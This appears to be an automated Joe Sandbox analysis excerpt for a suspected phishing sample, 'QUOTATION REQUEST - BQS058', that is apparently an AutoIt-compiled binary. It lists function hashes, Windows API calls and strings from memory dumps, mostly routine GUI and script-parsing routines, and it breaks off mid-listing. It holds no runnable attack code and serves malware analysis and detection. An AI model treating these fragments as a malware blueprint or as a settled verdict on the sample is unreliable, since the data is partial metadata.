Instruction ID: 4a6466aaa9d4b254c5a8d61c64f1bb3cb36519f95cd954d253023b4c0b6d8b1d
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 2C014078A01209EFCB44DF98C5909AEF7F5FB88310F208599E919AB745D730AE51DB80

Function 015FB868 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: ef8fd53591f1f7f6b441a1d99a103dd410e2be4fae7fcb61c85ac5d545d94734
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 56018078A11109EFCB44DF98C5909AEF7F5FF88210F208599D909AB301D730AE41DB80

Function 015FA228 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096794282.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15f8000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 01047806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0104785B
DeleteObject.GDI32(00000000), ref: 0104786D
DestroyWindow.USER32 ref: 0104787B
GetDesktopWindow.USER32 ref: 01047895
GetWindowRect.USER32(00000000), ref: 0104789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010479DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010479ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A35
GetClientRect.USER32(00000000,?), ref: 01047A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01047A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047ABB
GlobalLock.KERNEL32(00000000), ref: 01047AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AD3
GlobalUnlock.KERNEL32(00000000), ref: 01047ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047AE3
GlobalFree.KERNEL32(00000000), ref: 01047AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01062CAC,00000000), ref: 01047B16
GlobalFree.KERNEL32(00000000), ref: 01047B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01047B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01047B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01047D7A

Strings

DISPLAY, xrefs: 01047BDD
, xrefs: 01047D00
static, xrefs: 01047A75, 01047BCC
AutoIt v3, xrefs: 01047A2D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
Instruction ID: 059c0d53508e58d14c64741c19903a7ab2d1ed33f7d319cf8337aadb31676654
Opcode Fuzzy Hash: c37a9f2f7a44af660b07ce26ccf52f64249d8207492f02abd13c0819def462d1
Instruction Fuzzy Hash: 55027FB5900209AFDB14EFA8DC89EAF7BB9FF49310F048159F955AB290C7799D01CB60

Function 0105356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0105F910), ref: 01053627
IsWindowVisible.USER32(?), ref: 0105364B

Strings

FINDSTRING, xrefs: 01053776
SETCURRENTSELECTION, xrefs: 010537B6
DELSTRING, xrefs: 01053749
GETCURRENTSELECTION, xrefs: 010537E3
UNCHECK, xrefs: 01053883
GETSELECTED, xrefs: 010538A3
TABRIGHT, xrefs: 0105369D
CURRENTTAB, xrefs: 010536BD
SHOWDROPDOWN, xrefs: 010536E0
ADDSTRING, xrefs: 01053716
GETLINECOUNT, xrefs: 010538C6
TABLEFT, xrefs: 01053687
ISVISIBLE, xrefs: 01053637
SELECTSTRING, xrefs: 01053806
GETCURRENTCOL, xrefs: 01053928
GETLINE, xrefs: 0105399B
EDITPASTE, xrefs: 0105395F
ISCHECKED, xrefs: 01053839
GETCURRENTLINE, xrefs: 010538ED
SENDCOMMANDID, xrefs: 010539DA
CHECK, xrefs: 0105386D
ISENABLED, xrefs: 0105366B
HIDEDROPDOWN, xrefs: 01053700

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
Instruction ID: 3a5ccc5c3553a8a9c818ed4b72322c837300043b8c1af779f108f007dc293c36
Opcode Fuzzy Hash: 9f386c7f0cb9c41fd0f281d74b4a47f8d1f67c547dceaf0eac63f5700720cf7e
Instruction Fuzzy Hash: B0D16B302083059BCB44FF14C955ABFBBE6BF94394F084459EDC25B3A2DB29E90ADB51

Function 0105A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0105A630
GetSysColorBrush.USER32(0000000F), ref: 0105A661
GetSysColor.USER32(0000000F), ref: 0105A66D
SetBkColor.GDI32(?,000000FF), ref: 0105A687
SelectObject.GDI32(?,00000000), ref: 0105A696
InflateRect.USER32(?,000000FF,000000FF), ref: 0105A6C1
GetSysColor.USER32(00000010), ref: 0105A6C9
CreateSolidBrush.GDI32(00000000), ref: 0105A6D0
FrameRect.USER32(?,?,00000000), ref: 0105A6DF
DeleteObject.GDI32(00000000), ref: 0105A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 0105A731
FillRect.USER32(?,?,00000000), ref: 0105A763
GetWindowLongW.USER32(?,000000F0), ref: 0105A78E

Part of subcall function 0105A8CA: GetSysColor.USER32(00000012), ref: 0105A903
Part of subcall function 0105A8CA: SetTextColor.GDI32(?,?), ref: 0105A907
Part of subcall function 0105A8CA: GetSysColorBrush.USER32(0000000F), ref: 0105A91D
Part of subcall function 0105A8CA: GetSysColor.USER32(0000000F), ref: 0105A928
Part of subcall function 0105A8CA: GetSysColor.USER32(00000011), ref: 0105A945
Part of subcall function 0105A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
Part of subcall function 0105A8CA: SelectObject.GDI32(?,00000000), ref: 0105A964
Part of subcall function 0105A8CA: SetBkColor.GDI32(?,00000000), ref: 0105A96D
Part of subcall function 0105A8CA: SelectObject.GDI32(?,?), ref: 0105A97A
Part of subcall function 0105A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
Part of subcall function 0105A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
Part of subcall function 0105A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
Part of subcall function 0105A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: f180e38728739854bd6ae454b71c592bd6a660e7e75e05c1373ed15a5afe8a1e
Instruction ID: 993d6c7c1ed5b96e9102550cdb8b81664754eb4fbebdb0d115e4373fef776143
Opcode Fuzzy Hash: f180e38728739854bd6ae454b71c592bd6a660e7e75e05c1373ed15a5afe8a1e
Instruction Fuzzy Hash: 29918D72108306EFDB619F64DC08A5B7BE9FF89325F100B19FAA297190D73AD944CB51

Function 00FD2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00FD2CA2
DeleteObject.GDI32(00000000), ref: 00FD2CE8
DeleteObject.GDI32(00000000), ref: 00FD2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00FD2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00FD2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0100C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0100C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0100C89D

Part of subcall function 00FD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FD2036,?,00000000,?,?,?,?,00FD16CB,00000000,?), ref: 00FD1B9A

SendMessageW.USER32(?,00001053), ref: 0100C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0100C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0100C912

Strings

0, xrefs: 0100C731

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
Instruction ID: 30f6eb9c07c9104225422f32d1019e7e3b2bf448eaec4275fd7ca4f5b9a48f95
Opcode Fuzzy Hash: 8bc1f3d2d8a3b2475633f74b10959388fa5f57d320651a02bc3bce04a863623e
Instruction Fuzzy Hash: 8A12A230504201DFFB66CF28C984BA9BBE1FF44311F5846AAF995CB292C735E881DB91

Function 010474AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 010474DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0104759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010475DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010475ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01047633
GetClientRect.USER32(00000000,?), ref: 0104763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01047683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01047692
GetStockObject.GDI32(00000011), ref: 010476A2
SelectObject.GDI32(00000000,00000000), ref: 010476A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010476B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 010476BF
DeleteDC.GDI32(00000000), ref: 010476C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010476F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 0104770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01047746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0104775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 0104776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0104779B
GetStockObject.GDI32(00000011), ref: 010477A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010477B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010477BB

Strings

DISPLAY, xrefs: 01047688
msctls_progress32, xrefs: 0104773C
static, xrefs: 0104767D, 01047795
AutoIt v3, xrefs: 0104762B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
Instruction ID: 8ed0947c96259ba1adc5369facb9876a7c88b6e949140ae39929ad91907af914
Opcode Fuzzy Hash: 0f8d9389b6f94cfcaa86fd81012c050645c92dacdfb329f8faadeb8a5319b52e
Instruction Fuzzy Hash: 81A170B1A00205BFEB24DBA5DC5AFAF7BB9EB05710F044155FA54AB2D0C7B9AD00CB64

Function 0103AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0103AD1E
GetDriveTypeW.KERNEL32(?,0105FAC0,?,\\.\,0105F910), ref: 0103ADFB
SetErrorMode.KERNEL32(00000000,0105FAC0,?,\\.\,0105F910), ref: 0103AF59

Strings

Virtual, xrefs: 0103AF21
SSA, xrefs: 0103AEE2
USB, xrefs: 0103AEF0
CDROM, xrefs: 0103AE2F
SAS, xrefs: 0103AF05
RAID, xrefs: 0103AEF7
MMC, xrefs: 0103AF1A
ATA, xrefs: 0103AED4
Removable, xrefs: 0103AE4D
Network, xrefs: 0103AE39
Unknown, xrefs: 0103AE1B, 0103AEBF
SCSI, xrefs: 0103AEC6
Fixed, xrefs: 0103AE43
SSD, xrefs: 0103AE86
SATA, xrefs: 0103AF0C
iSCSI, xrefs: 0103AEFE
FileBackedVirtual, xrefs: 0103AF28
1394, xrefs: 0103AEDB
Fibre, xrefs: 0103AEE9
\\.\, xrefs: 0103AD70
ATAPI, xrefs: 0103AECD
PhysicalDrive, xrefs: 0103ADA7
RAMDisk, xrefs: 0103AE25

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: de64c1f15637483fe9ee27802877fd644a325b72831da727ebfe95db1b8334c9
Instruction ID: 82f427ef86258bc7844bac84841cbb1f03aff96073cf68c902e19b882255e01e
Opcode Fuzzy Hash: de64c1f15637483fe9ee27802877fd644a325b72831da727ebfe95db1b8334c9
Instruction Fuzzy Hash: 7C51FFB4748205EF8B50FB95C882DBEB7A9EFC8600B94895BE4C3EF2D0D6359901DB51

Function 00FD68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FD6931
__wcsnicmp.LIBCMT ref: 00FD6949
__wcsnicmp.LIBCMT ref: 00FD6961
__wcsnicmp.LIBCMT ref: 00FD6979
__wcsnicmp.LIBCMT ref: 00FD6991
__wcsnicmp.LIBCMT ref: 00FD69A9
__wcsnicmp.LIBCMT ref: 00FD69C1
__wcsnicmp.LIBCMT ref: 00FD69D5
__wcsnicmp.LIBCMT ref: 00FD6A16
__wcsnicmp.LIBCMT ref: 00FD6A2A
__wcsnicmp.LIBCMT ref: 00FD6A3E
__wcsnicmp.LIBCMT ref: 00FD6A52

Strings

Cannot parse #include, xrefs: 0100E3F0
#include, xrefs: 00FD69A3
#comments-end, xrefs: 00FD6A38
#comments-start, xrefs: 00FD69BB, 00FD6A10
#notrayicon, xrefs: 00FD6943
#OnAutoItStartRegister, xrefs: 00FD6973
Bad directive syntax error, xrefs: 0100E31A
#ce, xrefs: 00FD6A4C
#cs, xrefs: 00FD69CF, 00FD6A24
Unterminated group of comments, xrefs: 0100E403
#include-once, xrefs: 00FD698B
#pragma compile, xrefs: 00FD692B
#requireadmin, xrefs: 00FD695B

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 420ff1cb02dfeb015ef447bf9c19c6981870d5264d2be1674b7f195cd78ced5e
Instruction ID: bf4a30f0ea59163f4c13bcbfe3bc1f77d7574818bb7f48a280028afe6db07749
Opcode Fuzzy Hash: 420ff1cb02dfeb015ef447bf9c19c6981870d5264d2be1674b7f195cd78ced5e
Instruction Fuzzy Hash: 76815EB16002056ADB11BF25DC52FBF37A9AF04750F084016FE81EA2D2EB74DE05F251

Function 01059A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 01059AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 01059B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 01059BA7

Strings

0, xrefs: 01059BE4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
Instruction ID: b3d5d63c19252ea6fc0dbccc880e91ebf4629ca88122107337ab3476ab8f453f
Opcode Fuzzy Hash: 90c761f730f5ba9e957a9e374ef507c13f06b818dd2442ea47a231f64129aa49
Instruction Fuzzy Hash: 9C028B30104301EBEBA58F28C858BABBFE5FF49318F04495DFAD9962A1C779D944CB91

Function 0105A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0105A903
SetTextColor.GDI32(?,?), ref: 0105A907
GetSysColorBrush.USER32(0000000F), ref: 0105A91D
GetSysColor.USER32(0000000F), ref: 0105A928
CreateSolidBrush.GDI32(?), ref: 0105A92D
GetSysColor.USER32(00000011), ref: 0105A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0105A953
SelectObject.GDI32(?,00000000), ref: 0105A964
SetBkColor.GDI32(?,00000000), ref: 0105A96D
SelectObject.GDI32(?,?), ref: 0105A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0105A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0105A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0105A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0105A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0105AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0105AA32
DrawFocusRect.USER32(?,?), ref: 0105AA3D
GetSysColor.USER32(00000011), ref: 0105AA4B
SetTextColor.GDI32(?,00000000), ref: 0105AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0105AA67
SelectObject.GDI32(?,0105A5FA), ref: 0105AA7E
DeleteObject.GDI32(?), ref: 0105AA89
SelectObject.GDI32(?,?), ref: 0105AA8F
DeleteObject.GDI32(?), ref: 0105AA94
SetTextColor.GDI32(?,?), ref: 0105AA9A
SetBkColor.GDI32(?,?), ref: 0105AAA4

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 3445ba08940443e474ed4664faea5b776d10ccd11c1c0bcb8cf33839cc0536b0
Instruction ID: b5b6cc9782e14e46c15c96f7e794573cdf399c1c5958a0daddc9f18d68dcec57
Opcode Fuzzy Hash: 3445ba08940443e474ed4664faea5b776d10ccd11c1c0bcb8cf33839cc0536b0
Instruction Fuzzy Hash: 92516C75900219EFDF219FA8DC48EAF7BB9FF08320F114615FA51AB291D77A9940CB90

Function 010589D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 01058AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058AD2
CharNextW.USER32(0000014E), ref: 01058B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01058B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01058B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01058B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 01058B86
SetWindowTextW.USER32(?,0000014E), ref: 01058BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 01058BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 01058C1F
_memset.LIBCMT ref: 01058C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 01058C8D
_memset.LIBCMT ref: 01058CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 01058D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 01058D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 01058E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 01058E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01058EB4
DrawMenuBar.USER32(?), ref: 01058EC3
SetWindowTextW.USER32(?,0000014E), ref: 01058EEB

Strings

